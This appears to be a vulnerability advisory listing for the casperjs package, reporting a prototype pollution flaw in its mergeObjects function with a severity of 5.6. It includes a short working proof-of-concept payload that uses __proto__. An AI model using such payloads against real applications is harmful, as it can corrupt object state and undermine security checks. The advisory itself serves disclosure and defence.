casperjs
summary
Prototype Pollution
affected versions
*
severity
5.6

Overview

casperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS.

This package is vulnerable to Prototype Pollution. The mergeObjects utility function is vulnerable to Prototype Pollution.

Proof of Concept

var payload = JSON.parse('{"__proto__": {"a": "pwned"}}')
mergeObjects({}, payload)
console.log({}.a) // prints "pwned"

References

Cash
$25
XP
560

Popularity
1.05K

7.31K
1.18M